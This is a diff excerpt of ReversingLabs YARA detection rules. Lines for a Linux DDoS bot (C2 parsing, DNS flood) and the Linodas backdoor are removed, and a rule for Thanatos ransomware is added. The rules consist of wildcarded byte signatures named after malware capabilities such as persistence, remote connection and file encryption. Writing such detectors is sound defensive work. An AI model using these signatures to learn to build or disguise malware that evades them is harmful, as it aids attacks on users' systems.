+            ?? 51 FF 15 ?? ?? ?? ?? B8 ?? ?? ?? ?? E9 ?? ?? ?? ?? 83 7D ?? ?? 77 ?? 81 7D ?? ??
+            ?? ?? ?? 0F 86 ?? ?? ?? ?? C7 45 ?? ?? ?? ?? ?? 33 D2 89 55 ?? 0F 57 C0 66 0F 13 45
+            ?? 6A ?? 6A ?? 8B 45 ?? 50 8B 4D ?? 51 8B 55 ?? 52 FF 15 ?? ?? ?? ?? 89 85 ?? ?? ??
+            ?? 83 BD ?? ?? ?? ?? ?? 75 ?? 8B 45 ?? 50 FF 15 ?? ?? ?? ?? 8B 4D ?? 51 FF 15 ?? ??
+            ?? ?? B8 ?? ?? ?? ?? E9 ?? ?? ?? ?? C7 85 ?? ?? ?? ?? ?? ?? ?? ?? 6A ?? 8D 95 ?? ??
+            ?? ?? 52 6A ?? 8D 85 ?? ?? ?? ?? 50 8B 4D ?? 51 FF 15 ?? ?? ?? ?? 89 85 ?? ?? ?? ??
+            83 BD ?? ?? ?? ?? ?? 75 ?? 8B 55 ?? 52 FF 15 ?? ?? ?? ?? 8B 45 ?? 50 FF 15 ?? ?? ??
+            ?? B8 ?? ?? ?? ?? EB ?? 8B 4D ?? 51 FF 15 ?? ?? ?? ?? 68 ?? ?? ?? ?? 6A ?? 8B 55 ??
+            52 E8 ?? ?? ?? ?? 83 C4 ?? 8B 45 ?? 50 FF 15 ?? ?? ?? ?? 68 ?? ?? ?? ?? 6A ?? 8D 8D
+            ?? ?? ?? ?? 51 E8 ?? ?? ?? ?? 83 C4 ?? C7 45 ?? ?? ?? ?? ?? B8 ?? ?? ?? ?? EB ?? B8
+            ?? ?? ?? ?? 8B E5 5D C3
         }
-		$parse_c2_commands_64 = {
-            41 57 31 C0 49 89 FF B9 ?? ?? ?? ?? 41 56 41 55 41 54 55 53 48 81 EC ?? ?? ?? ?? 48
-            8D 9C 24 ?? ?? ?? ?? 40 88 B4 24 ?? ?? ?? ?? 4C 8D AC 24 ?? ?? ?? ?? 4C 8D A4 24 ??
-            ?? ?? ?? 48 8D AC 24 ?? ?? ?? ?? 48 89 DF F3 48 AB C7 07 ?? ?? ?? ?? BF ?? ?? ?? ??
-            E8 ?? ?? ?? ?? 48 8D 43 ?? 48 89 84 24 ?? ?? ?? ?? 0F 1F 00 8B 3D ?? ?? ?? ?? 31 C9
-            BA ?? ?? ?? ?? 48 89 DE E8 ?? ?? ?? ?? 48 85 C0 0F 84 ?? ?? ?? ?? 44 8B B4 24 ?? ??
-            ?? ?? 45 85 F6 0F 84 ?? ?? ?? ?? 31 C0 44 89 F6 BF ?? ?? ?? ?? E8 ?? ?? ?? ?? 8B 84
-            24 ?? ?? ?? ?? 83 F8 ?? 74 ?? 83 F8 ?? 0F 84 ?? ?? ?? ?? 41 83 FE ?? 0F 84 ?? ?? ??
-            ?? 41 83 FE ?? 0F 84 ?? ?? ?? ?? 83 F8 ?? 0F 84 ?? ?? ?? ?? 41 83 FE ?? 0F 84 ?? ??
-            ?? ?? 41 83 FE ?? 0F 84 ?? ?? ?? ?? 41 83 FE ?? 0F 84 ?? ?? ?? ?? 41 83 FE ?? 0F 85
-            ?? ?? ?? ?? 48 8D BC 24 ?? ?? ?? ?? 31 C0 B9 ?? ?? ?? ?? F3 48 AB 48 8B 84 24 ?? ??
-            ?? ?? 4C 8B 9C 24 ?? ?? ?? ?? 4C 8B 94 24 ?? ?? ?? ?? 4C 8B 8C 24 ?? ?? ?? ?? 4C 8B
-            84 24 ?? ?? ?? ?? 48 8B 8C 24 ?? ?? ?? ?? C7 07 ?? ?? ?? ?? 48 89 84 24 ?? ?? ?? ??
-            48 8B 84 24 ?? ?? ?? ?? 48 8B BC 24 ?? ?? ?? ?? 48 8B B4 24 ?? ?? ?? ?? 48 8B 94 24
-            ?? ?? ?? ?? 4C 8B B4 24 ?? ?? ?? ?? 4C 8B AC 24 ?? ?? ?? ?? 4C 8B A4 24 ?? ?? ?? ??
-            48 8B AC 24 ?? ?? ?? ?? 48 8B 9C 24 ?? ?? ?? ?? 48 89 84 24 ?? ?? ?? ?? 48 8B 84 24
-            ?? ?? ?? ?? 4C 89 9C 24 ?? ?? ?? ?? 4C 89 94 24 ?? ?? ?? ?? 4C 89 8C 24 ?? ?? ?? ??
-            4C 89 84 24 ?? ?? ?? ?? 48 89 8C 24 ?? ?? ?? ?? 48 89 BC 24 ?? ?? ?? ?? 48 89 B4 24
-            ?? ?? ?? ?? 48 89 94 24 ?? ?? ?? ?? 4C 89 B4 24 ?? ?? ?? ?? 4C 89 AC 24 ?? ?? ?? ??
-            4C 89 A4 24 ?? ?? ?? ?? 48 89 AC 24 ?? ?? ?? ?? 48 89 9C 24 ?? ?? ?? ?? 48 89 84 24
-            ?? ?? ?? ?? 49 89 57 ?? 48 8B 94 24 ?? ?? ?? ?? 49 89 77 ?? 48 8D B4 24
+		$remote_connection = {
+            55 8B EC 81 EC ?? ?? ?? ?? 8B 45 ?? C7 00 ?? ?? ?? ?? C7 40 ?? ?? ?? ?? ?? C7 45 ??
+            ?? ?? ?? ?? C7 45 ?? ?? ?? ?? ?? 8D 4D ?? 51 6A ?? 6A ?? 6A ?? 6A ?? E8 ?? ?? ?? ??
+            89 45 ?? 6A ?? 68 ?? ?? ?? ?? 8B 55 ?? 52 6A ?? FF 15 ?? ?? ?? ?? 89 45 ?? 83 7D ??
+            ?? 0F 84 ?? ?? ?? ?? 8B 45 ?? 89 45 ?? 8D 4D ?? 51 8B 55 ?? 52 6A ?? 6A ?? 6A ?? E8
+            ?? ?? ?? ?? 89 45 ?? C7 45 ?? ?? ?? ?? ?? 8B 45 ?? 89 45 ?? EB ?? 8B 4D ?? 8B 51 ??
+            89 55 ?? 83 7D ?? ?? 0F 84 ?? ?? ?? ?? 8B 45 ?? 83 C0 ?? 89 45 ?? C7 45 ?? ?? ?? ??
+            ?? 8B 4D ?? 8B 51 ?? 89 55 ?? EB ?? 8B 45 ?? 8B 48 ?? 89 4D ?? 83 7D ?? ?? 0F 84 ??
+            ?? ?? ?? 8B 55 ?? 83 C2 ?? 89 55 ?? 8D 85 ?? ?? ?? ?? 50 8B 4D ?? 83 C1 ?? 51 E8 ??
+            ?? ?? ?? 83 C4 ?? 68 ?? ?? ?? ?? 8D 95 ?? ?? ?? ?? 52 E8 ?? ?? ?? ?? 83 C4 ?? B9 ??
+            ?? ?? ?? 6B D1 ?? 8D 8C 15 ?? ?? ?? ?? 3B C1 74 ?? 68 ?? ?? ?? ?? 8D 95 ?? ?? ?? ??
+            52 E8 ?? ?? ?? ?? 83 C4 ?? 85 C0 75 ?? 68 ?? ?? ?? ?? 8D 85 ?? ?? ?? ?? 50 E8 ?? ??
+            ?? ?? 83 C4 ?? 85 C0 0F 84 ?? ?? ?? ?? 0F 57 C0 66 0F 13 45 ?? C7 45 ?? ?? ?? ?? ??
+            8D 8D ?? ?? ?? ?? 51 FF 15 ?? ?? ?? ?? 89 45 ?? 83 7D ?? ?? 75 ?? 83 C8 ?? E9 ?? ??
+            ?? ?? 8D 55 ?? 89 55 ?? 8D 45 ?? 50 8B 4D ?? 0F B6 51 ?? 52 E8
         }
-		$dns_flood_64_p1 = {
-            41 55 41 54 55 53 48 81 EC ?? ?? ?? ?? 83 3D ?? ?? ?? ?? ?? 0F 84 ?? ?? ?? ?? 49 89
-            FC BB ?? ?? ?? ?? 48 8D 7C 24 ?? 48 89 D9 4C 89 E6 48 8D AC 24 ?? ?? ?? ?? F3 48 A5
-            8B 06 48 89 CB 89 07 0F B7 46 ?? 8B 35 ?? ?? ?? ?? 66 89 47 ?? BF ?? ?? ?? ?? 31 C0
-            E8 ?? ?? ?? ?? 48 C7 04 24 ?? ?? ?? ?? 48 C7 44 24 ?? ?? ?? ?? ?? 66 C7 04 24 ?? ??
-            66 C7 44 24 ?? ?? ?? E8 ?? ?? ?? ?? 31 D2 BE ?? ?? ?? ?? BF ?? ?? ?? ?? F7 35 ?? ??
-            ?? ?? 89 D2 8B 04 95 ?? ?? ?? ?? BA ?? ?? ?? ?? 89 44 24 ?? E8 ?? ?? ?? ?? BA ?? ??
-            ?? ?? 48 89 E6 89 C7 41 89 C5 E8 ?? ?? ?? ?? 48 89 D8 B9 ?? ?? ?? ?? 48 89 EF F3 48
-            AB 48 8D 7C 24 ?? BE ?? ?? ?? ?? 48 8D 9C 24 ?? ?? ?? ?? E8 ?? ?? ?? ?? 8B 44 24 ??
-            48 8D 7D ?? 48 8D 74 24 ?? 89 84 24 ?? ?? ?? ?? 0F B7 44 24 ?? 66 89 84 24 ?? ?? 00
-            00 E8 ?? ?? ?? ?? 48 89 EE 48 89 DF C6 84 24 ?? ?? ?? ?? ?? C6 84 24
+		$find_files_p1 = {
+            8B FF 55 8B EC 51 8B 4D ?? 53 57 33 DB 8D 51 ?? 66 8B 01 83 C1 ?? 66 3B C3 75 ?? 8B
+            7D ?? 2B CA D1 F9 83 C8 ?? 41 2B C7 89 4D ?? 3B C8 76 ?? 6A ?? 58 EB ?? 56 8D 5F ??
+            03 D9 6A ?? 53 E8 ?? ?? ?? ?? 8B F0 59 59 85 FF 74 ?? 57 FF 75 ?? 53 56 E8 ?? ?? ??
+            ?? 83 C4 ?? 85 C0 75 ?? FF 75 ?? 2B DF 8D 04 7E FF 75 ?? 53 50 E8 ?? ?? ?? ?? 83 C4
+            ?? 85 C0 75 ?? 8B 4D ?? 56 E8 ?? ?? ?? ?? 6A ?? 8B F0 E8 ?? ?? ?? ?? 59 8B C6 5E 5F
+            5B 8B E5 5D C3 33 C0 50 50 50 50 50 E8 ?? ?? ?? ?? CC 8B FF 55 8B EC 81 EC ?? ?? ??
+            ?? A1 ?? ?? ?? ?? 33 C5 89 45 ?? 8B 55 ?? 8B 4D ?? 53 8B 5D ?? 56 57 6A ?? 5E 6A ??
+            89 95 ?? ?? ?? ?? C7 85 ?? ?? ?? ?? ?? ?? ?? ?? 5F EB ?? 0F B7 01 66 3B 85 ?? ?? ??
+            ?? 74 ?? 66 3B C6 74 ?? 66 3B C7 74 ?? 83 E9 ?? 3B CB 75 ?? 0F B7 31 66 3B F7 75 ??
+            8D 43 ?? 3B C8 74 ?? 52 33 FF 57 57 53 E8 ?? ?? ?? ?? 83 C4 ?? E9 ?? ?? ?? ?? 6A ??
+            8B C6 33 FF 5A 66 3B C2 74 ?? 6A ?? 5A 66 3B C2 74 ?? 6A ?? 5A 66 3B C2 74 ?? 8B C7
         }
-		$dns_flood_64_p2 = {
-            66 C7 84 24 ?? ?? 00 00 ?? ?? 66 C7 84 24 ?? ?? 00 00 ?? ?? 66 C7 84 24 ?? ?? 00 00
-            ?? ?? 66 C7 84 24 ?? ?? 00 00 ?? ?? E8 ?? ?? ?? ?? 48 89 D9 8B 01 48 83 C1 ?? 8D 90
-            ?? ?? ?? ?? F7 D0 21 C2 81 E2 ?? ?? ?? ?? 74 ?? 89 D0 C1 E8 ?? F7 C2 ?? ?? ?? ?? 0F
-            44 D0 48 8D 41 ?? 48 0F 44 C8 00 D2 48 83 D9 ?? 48 29 D9 48 8D 84 0C ?? ?? ?? ?? 48
-            8D 8C 24 ?? ?? ?? ?? 66 C7 00 ?? ?? 66 C7 40 ?? ?? ?? 48 89 CB 8B 13 48 83 C3 ?? 8D
-            82 ?? ?? ?? ?? F7 D2 21 D0 25 ?? ?? ?? ?? 74 ?? 89 C2 48 8D 7C 24 ?? BE ?? ?? ?? ??
-            C1 EA ?? A9 ?? ?? ?? ?? 0F 44 C2 48 8D 53 ?? 48 0F 44 DA 00 C0 48 83 DB ?? 48 29 CB
-            E8 ?? ?? ?? ?? 8B 44 24 ?? 48 8D BC 24 ?? ?? ?? ?? 48 89 EE 89 84 24 ?? ?? ?? ?? 0F
-            B7 44 24 ?? 66 89 84 24 ?? ?? 00 00 E8 ?? ?? ?? ?? 48 8D 7D ?? 48 8D 74 24 ?? E8 ??
-            ?? ?? ?? 41 83 BC 24 ?? ?? ?? ?? ?? 0F 84 ?? ?? ?? ?? E8 ?? ?? ?? ?? 89 C2 B9 ?? ??
-            ?? ?? 83 C3 ?? C1 FA ?? F7 F9 8D 42 ?? 66 C1 C8 ?? 66 89 84 24 ?? ?? 00 00 E8 ?? ??
-            ?? ?? 31 D2 48 8D B4 24 ?? ?? ?? ?? 31 C9 F7 35 ?? ?? ?? ?? 41 B9 ?? ?? ?? ?? 49 89
-            E0 44 89 EF 89 D2 8B 04 95 ?? ?? ?? ?? 48 63 D3 89 44 24 ?? E8 ?? ?? ?? ?? 49 83 84
-            24 ?? ?? ?? ?? ?? 83 3D ?? ?? ?? ?? ?? 74 ?? BF ?? ?? ?? ?? E8
+		$find_files_p2 = {
+            EB ?? 33 C0 40 2B CB 0F B6 C0 D1 F9 41 F7 D8 68 ?? ?? ?? ?? 1B C0 23 C1 89 85 ?? ??
+            ?? ?? 8D 85 ?? ?? ?? ?? 57 50 E8 ?? ?? ?? ?? 83 C4 ?? 8D 85 ?? ?? ?? ?? 57 57 57 50
+            57 53 FF 15 ?? ?? ?? ?? 8B F0 83 FE ?? 75 ?? 8B 85 ?? ?? ?? ?? 50 57 57 53 E8 ?? ??
+            ?? ?? 83 C4 ?? 8B F8 83 FE ?? 74 ?? 56 FF 15 ?? ?? ?? ?? 8B C7 8B 4D ?? 5F 5E 33 CD
+            5B E8 ?? ?? ?? ?? 8B E5 5D C3 8B 8D ?? ?? ?? ?? 6A ?? 8B 41 ?? 2B 01 C1 F8 ?? 89 85
+            ?? ?? ?? ?? 58 66 39 85 ?? ?? ?? ?? 75 ?? 66 39 BD ?? ?? ?? ?? 74 ?? 66 39 85 ?? ??
+            ?? ?? 75 ?? 66 39 BD ?? ?? ?? ?? 74 ?? 51 FF B5 ?? ?? ?? ?? 8D 85 ?? ?? ?? ?? 53 50
+            E8 ?? ?? ?? ?? 83 C4 ?? 85 C0 75 ?? 8D 85 ?? ?? ?? ?? 50 56 FF 15 ?? ?? ?? ?? 8B 8D
+            ?? ?? ?? ?? 85 C0 6A ?? 58 75 ?? 8B C1 8B 8D ?? ?? ?? ?? 8B 10 8B 40 ?? 2B C2 C1 F8
+            ?? 3B C8 0F 84 ?? ?? ?? ?? 68 ?? ?? ?? ?? 2B C1 6A ?? 50 8D 04 8A 50 E8 ?? ?? ?? ??
+            83 C4 ?? E9
         }
 
 	condition:
-		uint32( 0 ) == 0x464C457F and ( ( ( all of ( $collect_system_information_32_p* ) ) and ( $send_system_info_32 ) and ( $parse_c2_commands_32 ) and ( all of ( $dns_flood_32_p* ) ) ) or ( ( all of ( $collect_system_information_64_p* ) ) and ( $send_system_info_64 ) and ( $parse_c2_commands_64 ) and ( all of ( $dns_flood_64_p* ) ) ) )
+		uint16( 0 ) == 0x5A4D and ( all of ( $find_files_p* ) ) and ( all of ( $encrypt_files_p* ) ) and ( $remote_connection )
 }
-rule REVERSINGLABS_Linux_Backdoor_Linodas : TC_DETECTION MALICIOUS MALWARE FILE
+rule REVERSINGLABS_Win32_Ransomware_Thanatos : TC_DETECTION MALICIOUS MALWARE FILE
 {
 	meta:
-		description = "Yara rule that detects Linodas backdoor."
+		description = "Yara rule that detects Thanatos ransomware."
 		author = "ReversingLabs"
-		id = "2b197346-abce-5cff-938f-bb8742e03168"
-		date = "2024-05-22"
-		modified = "2024-05-22"
+		id = "190adbd0-30a7-5619-ab70-3ab031ece2f7"
+		date = "2020-11-13"
+		modified = "2020-11-13"
 		reference = "ReversingLabs"
-		source_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/e0a0be54aa1e11ccfd6854e4f19e9476f328fd84/yara/backdoor/Linux.Backdoor.Linodas.yara#L1-L216"
+		source_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/e0a0be54aa1e11ccfd6854e4f19e9476f328fd84/yara/ransomware/Win32.Ransomware.Thanatos.yara#L1-L85"
 		license_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/e0a0be54aa1e11ccfd6854e4f19e9476f328fd84/LICENSE"
-		logic_hash = "12445771106e36b74b1ea292a8a25cab66bcaf0a08cf88d39a9f1bb13c6f525b"
+		logic_hash = "a51fa9cf1a08e4cd252a8b385be3bfde909585e2a799baaede977e40ecff5313"
 		score = 75
 		quality = 90
 		tags = "TC_DETECTION, MALICIOUS, MALWARE, FILE"
 		status = "RELEASED"
 		sharing = "TLP:WHITE"
 		category = "MALWARE"
-		tc_detection_type = "Backdoor"
-		tc_detection_name = "Linodas"
+		tc_detection_type = "Ransomware"
+		tc_detection_name = "Thanatos"
 		tc_detection_factor = 5
 		importance = 25
 
 	strings:
-		$persistence_mechanism_ubuntu = {
-            41 54 BE ?? ?? ?? ?? 55 53 48 81 EC ?? ?? ?? ?? 48 8D 6C 24 ?? 48 8D 54 24 ?? 48 89
-            EF E8 ?? ?? ?? ?? 48 8B 7C 24 ?? 31 F6 E8 ?? ?? ?? ?? 85 C0 74 ?? 48 8D 5C 24 ?? 48
-            89 EE 48 89 DF E8 ?? ?? ?? ?? 48 89 DF E8 ?? ?? ?? ?? 48 8B 5C 24 ?? 48 83 EB ?? 48
-            81 FB ?? ?? ?? ?? 0F 85 ?? ?? ?? ?? 48 8D 6C 24 ?? 48 8D 54 24 ?? BE ?? ?? ?? ?? 48
-            89 EF E8 ?? ?? ?? ?? 48 8B 7C 24 ?? 31 F6 E8 ?? ?? ?? ?? 85 C0 74 ?? 48 8D 5C 24 ??
-            48 89 EE 48 89 DF E8 ?? ?? ?? ?? 48 89 DF E8 ?? ?? ?? ?? 48 8B 5C 24 ?? 48 83 EB ??
-            48 81 FB ?? ?? ?? ?? 0F 85 ?? ?? ?? ?? 48 8D 5C 24 ?? 48 89 EE 48 89 DF E8 ?? ?? ??
-            ?? 48 89 DF E8 ?? ?? ?? ?? 48 8B 5C 24 ?? 41 BC ?? ?? ?? ?? 48 83 EB ?? 4C 39 E3 0F
-            85 ?? ?? ?? ?? 4C 8B 44 24 ?? B9 ?? ?? ?? ?? BA ?? ?? ?? ?? BE ?? ?? ?? ?? 48 89 E7
-            E8 ?? ?? ?? ?? 48 89 E7 E8 ?? ?? ?? ?? BE ?? ?? ?? ?? 48 89 E7 E8 ?? ?? ?? ?? 85 C0
-            74 ?? 48 8B 4C 24 ?? BA ?? ?? ?? ?? BE ?? ?? ?? ?? BF ?? ?? ?? ?? E8 ?? ?? ?? ?? 48
-            8D 5C 24 ?? 4C 8B 44 24 ?? B9 ?? ?? ?? ?? BA ?? ?? ?? ?? BE ?? ?? ?? ?? 48 89 DF E8
-            ?? ?? ?? ?? 48 89 DE 48 89 E7 E8 ?? ?? ?? ?? 48 8B 5C 24 ?? 48 83 EB ?? 49 39 DC 0F
-            85 ?? ?? ?? ?? BE ?? ?? ?? ?? 48 89 E7 E8 ?? ?? ?? ?? 85 C0 74 ?? 48 8B 4C 24 ?? BA
-            ?? ?? ?? ?? BE ?? ?? ?? ?? BF ?? ?? ?? ?? E8 ?? ?? ?? ?? 48 8D 5C 24 ?? 4C 8B 44 24
-            ?? B9 ?? ?? ?? ?? BA ?? ?? ?? ?? BE ?? ?? ?? ?? 48 89 DF E8 ?? ?? ?? ?? 48 89 DE 48
-            89 E7 E8 ?? ?? ?? ?? 48 8B 5C 24 ?? 48 83 EB ?? 49 39 DC 0F 85 ?? ?? ?? ?? BE ?? ??
-            ?? ?? 48 89 E7 E8 ?? ?? ?? ?? 85 C0 74 ?? 48 8B 4C 24 ?? BA ?? ?? ?? ?? BE ?? ?? ??
-            ?? BF ?? ?? ?? ?? E8 ?? ?? ?? ?? 48 8B 1C 24 48 83 EB ?? 49 39 DC 0F 85 ?? ?? ?? ??
-            48 8B 5C 24 ?? 48 83 EB ?? 49 39 DC 0F 85 ?? ?? ?? ?? 48 8B 5C 24 ?? 48 83 EB ?? 49
-            39 DC 0F 85 ?? ?? ?? ?? 48 81 C4 ?? ?? ?? ?? 5B 5D 41 5C C3
-        }
-		$network_communication_1 = {
-            48 89 5C 24 ?? 48 89 6C 24 ?? 48 89 F3 4C 89 64 24 ?? 4C 89 6C 24 ?? 48 81 EC ?? ??
-            ?? ?? 48 8B 06 48 89 FD 89 54 24 ?? 45 89 C4 48 83 78 ?? ?? 0F 84 ?? ?? ?? ?? 4C 8D
-            6C 24 ?? 48 8B 33 4C 89 EF E8 ?? ?? ?? ?? 48 8B 44 24 ?? 48 83 78 ?? ?? 0F 84 ?? ??
-            ?? ?? 45 84 E4 0F 85 ?? ?? ?? ?? BE ?? ?? ?? ?? BF ?? ?? ?? ?? E8 ?? ?? ?? ?? 88 45
-            ?? 80 7D ?? ?? 0F 84 ?? ?? ?? ?? C6 45 ?? ?? BA ?? ?? ?? ?? BE ?? ?? ?? ?? BF ?? ??
-            ?? ?? E8 ?? ?? ?? ?? 83 F8 ?? 89 C5 0F 84 ?? ?? ?? ?? 48 8D 4C 24 ?? 41 B8 ?? ?? ??
-            ?? BA ?? ?? ?? ?? BE ?? ?? ?? ?? 89 C7 48 C7 44 24 ?? ?? ?? ?? ?? 48 C7 44 24 ?? ??
-            ?? ?? ?? 48 8D 5C 24 ?? E8 ?? ?? ?? ?? 48 8D 4C 24 ?? BA ?? ?? ?? ?? BE ?? ?? ?? ??
-            41 B8 ?? ?? ?? ?? 89 EF 48 C7 44 24 ?? ?? ?? ?? ?? 48 C7 44 24 ?? ?? ?? ?? ?? E8 ??
-            ?? ?? ?? 48 8B 7C 24 ?? 48 C7 44 24 ?? ?? ?? ?? ?? 8B 44 24 ?? 48 C7 44 24 ?? ?? ??
-            ?? ?? 66 C1 C8 ?? 66 C7 44 24 ?? ?? ?? 66 89 44 24 ?? E8 ?? ?? ?? ?? BA ?? ?? ?? ??
-            89 44 24 ?? 48 89 DE 89 EF E8 ?? ?? ?? ?? 83 C0 ?? 0F 84 ?? ?? ?? ?? 0F 1F 44 00 ??
-            48 8B 5C 24 ?? 48 83 EB ?? 48 81 FB ?? ?? ?? ?? 0F 85 ?? ?? ?? ?? 89 E8 48 8B 5C 24
-            ?? 48 8B 6C 24 ?? 4C 8B 64 24 ?? 4C 8B AC 24 ?? ?? ?? ?? 48 81 C4 ?? ?? ?? ?? C3
-        }
-		$network_communication_2 = {
-            48 89 5C 24 ?? 48 89 6C 24 ?? 48 89 FB 4C 89 64 24 ?? BE ?? ?? ?? ?? 48 83 EC ?? BF
-            ?? ?? ?? ?? E8 ?? ?? ?? ?? 84 C0 74 ?? BF ?? ?? ?? ?? E8 ?? ?? ?? ?? 84 C0 0F 84 ??
-            ?? ?? ?? 48 8D 73 ?? 48 8D 53 ?? BF ?? ?? ?? ?? 48 8D 6C 24 ?? 45 31 E4 E8 ?? ?? ??
-            ?? 48 89 DF E8 ?? ?? ?? ?? 48 8B 73 ?? 48 89 EF E8 ?? ?? ?? ?? 48 8B 44 24 ?? 48 83
-            78 ?? ?? 74 ?? BE ?? ?? ?? ?? BF ?? ?? ?? ?? E8 ?? ?? ?? ?? 84 C0 0F 84 ?? ?? ?? ??
-            4C 8D 64 24 ?? 48 89 EE 4C 89 E7 E8 ?? ?? ?? ?? 4C 89 E6 48 89 DF E8 ?? ?? ?? ?? 48
-            8B 6C 24 ?? 41 89 C4 48 83 ED ?? 48 81 FD ?? ?? ?? ?? 0F 85 ?? ?? ?? ?? 45 84 E4 74
-            ?? 80 7B ?? ?? 0F 84 ?? ?? ?? ?? 90 48 89 DF E8 ?? ?? ?? ?? 48 8B 5C 24 ?? 41 0F B6
-            EC 48 83 EB ?? 48 81 FB ?? ?? ?? ?? 0F 85 ?? ?? ?? ?? 89 E8 48 8B 5C 24 ?? 48 8B 6C
-            24 ?? 4C 8B 64 24 ?? 48 83 C4 ?? C3
-        }
-		$persistence_mechanism_redhat_v11 = {
-            41 57 41 56 41 55 41 54 55 53 48 83 EC ?? 48 8D 7C 24 ?? E8 ?? ?? ?? ?? 48 8B 6C 24
-            ?? 8B 7D ?? 4C 8D 7D ?? 81 C7 ?? ?? ?? ?? 48 63 FF E8 ?? ?? ?? ?? 48 89 C3 48 8D 7C
-            24 ?? 48 89 EE E8 ?? ?? ?? ?? 4C 8B 6C 24 ?? BE ?? ?? ?? ?? 48 89 DF 31 C0 4C 8D 74
-            24 ?? 4C 89 EA E8 ?? ?? ?? ?? 48 98 48 8D 54 24 ?? 48 89 DE C6 04 18 ?? 4C 89 F7 E8
-            ?? ?? ?? ?? 48 8B 7C 24 ?? 31 F6 E8 ?? ?? ?? ?? 85 C0 74 ?? 4C 89 E9 4C 89 EA BE ??
-            ?? ?? ?? 48 89 DF 49 89 E9 4D 89 E8 31 C0 E8 ?? ?? ?? ?? 48 8B 7C 24 ?? 41 89 C4 B9
-            ?? ?? ?? ?? 89 C2 48 89 DE E8 ?? ?? ?? ?? 48 8B 7C 24 ?? 31 F6 E8 ?? ?? ?? ?? 85 C0
-            0F 85 ?? ?? ?? ?? 48 8B 54 24 ?? 48 89 DF BE ?? ?? ?? ?? 31 C0 E8 ?? ?? ?? ?? 48 89
-            DF E8 ?? ?? ?? ?? 4C 89 EA BE ?? ?? ?? ?? 48 89 DF 31 C0 48 8D 6C 24 ?? E8 ?? ?? ??
-            ?? 48 98 48 8D 54 24 ?? 48 89 DE C6 04 18 ?? 48 89 EF E8 ?? ?? ?? ?? 48 89 E7 31 C9
-            BA ?? ?? ?? ?? 48 89 EE E8 ?? ?? ?? ?? 48 8B 6C 24 ?? 41 BE ?? ?? ?? ?? 4C 8B 24 24
-            48 83 ED ?? 4C 39 F5 0F 85 ?? ?? ?? ?? BE ?? ?? ?? ?? 4C 89 E7 E8 ?? ?? ?? ?? 48 85
-            C0 0F 84 ?? ?? ?? ?? 48 89 DF 49 8D 5C 24 ?? E8 ?? ?? ?? ?? 49 39 DE 0F 85 ?? ?? ??
-            ?? 48 8B 5C 24 ?? 48 83 EB ?? 49 39 DE 0F 85 ?? ?? ?? ?? 49 8D 5D ?? 49 39 DE 0F 85
-            ?? ?? ?? ?? 49 81 FF ?? ?? ?? ?? 0F 85 ?? ?? ?? ?? 48 83 C4 ?? 5B 5D 41 5C 41 5D 41
-            5E 41 5F C3
-        }
-		$change_timestamp_and_read_config_v11 = {
-            55 53 48 83 EC ?? 48 8D 5C 24 ?? 48 89 E7 E8 ?? ?? ?? ?? 48 89 E6 48 89 DF E8 ?? ??
-            ?? ?? 48 89 DF E8 ?? ?? ?? ?? 48 8B 5C 24 ?? 48 83 EB ?? 48 81 FB ?? ?? ?? ?? 0F 85
-            ?? ?? ?? ?? 48 89 E6 BF ?? ?? ?? ?? E8 ?? ?? ?? ?? 48 8B 1C 24 BE ?? ?? ?? ?? 48 89
-            DF E8 ?? ?? ?? ?? 48 85 C0 74 ?? 48 83 C0 ?? 89 C5 29 DD 8D 7D ?? 48 63 FF E8 ?? ??
-            ?? ?? 48 63 D5 48 89 C3 48 89 C7 C6 04 02 ?? 48 8B 34 24 E8 ?? ?? ?? ?? 48 89 DF E8
-            ?? ?? ?? ?? 48 89 DE 48 89 C2 BF ?? ?? ?? ?? E8 ?? ?? ?? ?? 48 89 DF E8 ?? ?? ?? ??
-            BA ?? ?? ?? ?? BE ?? ?? ?? ?? BF ?? ?? ?? ?? E8 ?? ?? ?? ?? 48 8B 1C 24 B8 ?? ?? ??
-            ?? 48 83 EB ?? 48 39 D8 75 ?? 48 83 C4 ?? 5B 5D C3
-        }
-		$generate_machine_id_v11 = {
-            41 57 BE ?? ?? ?? ?? 49 89 FF 41 56 41 55 41 54 55 53 48 81 EC ?? ?? ?? ?? 48 8D 9C
-            24 ?? ?? ?? ?? 48 8D 94 24 ?? ?? ?? ?? 48 89 DF E8 ?? ?? ?? ?? 4C 8D AC 24 ?? ?? ??
-            ?? 31 C9 BA ?? ?? ?? ?? 48 89 DE 4C 89 EF E8 ?? ?? ?? ?? 48 8B 9C 24 ?? ?? ?? ?? 41
-            BE ?? ?? ?? ?? 48 83 EB ?? 4C 39 F3 0F 85 ?? ?? ?? ?? 4C 8D A4 24 ?? ?? ?? ?? 48 8B
-            B4 24 ?? ?? ?? ?? B9 ?? ?? ?? ?? BA ?? ?? ?? ?? 4C 89 E7 E8 ?? ?? ?? ?? 48 8B 84 24
-            ?? ?? ?? ?? 48 83 78 ?? ?? 0F 84 ?? ?? ?? ?? 48 8D 9C 24 ?? ?? ?? ?? 48 8D 94 24 ??
-            ?? ?? ?? BE ?? ?? ?? ?? 48 89 DF E8 ?? ?? ?? ?? 48 8D AC 24 ?? ?? ?? ?? 31 C9 BA ??
-            ?? ?? ?? 48 89 DE 48 89 EF E8 ?? ?? ?? ?? 48 8B 9C 24 ?? ?? ?? ?? 48 83 EB ?? 49 39
-            DE 0F 85 ?? ?? ?? ?? 48 89 EE 4C 89 E7 E8 ?? ?? ?? ?? 48 8B B4 24 ?? ?? ?? ?? 48 8D
-            BC 24 ?? ?? ?? ?? 48 8B 56 ?? E8 ?? ?? ?? ?? 31 FF 4C 8B AC 24 ?? ?? ?? ?? E8 ?? ??
-            ?? ?? 89 C7 E8 ?? ?? ?? ?? E8 ?? ?? ?? ?? BA ?? ?? ?? ?? 89 C6 48 8D BC 24 ?? ?? ??
-            ?? F7 EA 89 F1 89 F5 C1 F9 ?? C1 FA ?? 29 CA 69 D2 ?? ?? ?? ?? 29 D5 E8 ?? ?? ?? ??
-            48 8B 9C 24 ?? ?? ?? ?? 41 89 E8 31 C0 4C 89 E9 BE ?? ?? ?? ?? 48 89 E7 48 89 DA 48
-            83 EB ?? E8 ?? ?? ?? ?? 49 39 DE 89 C5 0F 85 ?? ?? ?? ?? 48 63 C5 48 8D 94 24 ?? ??
-            ?? ?? 48 8D BC 24 ?? ?? ?? ?? C6 04 04 ?? 48 89 E6 E8 ?? ?? ?? ?? 48 8D 94 24 ?? ??
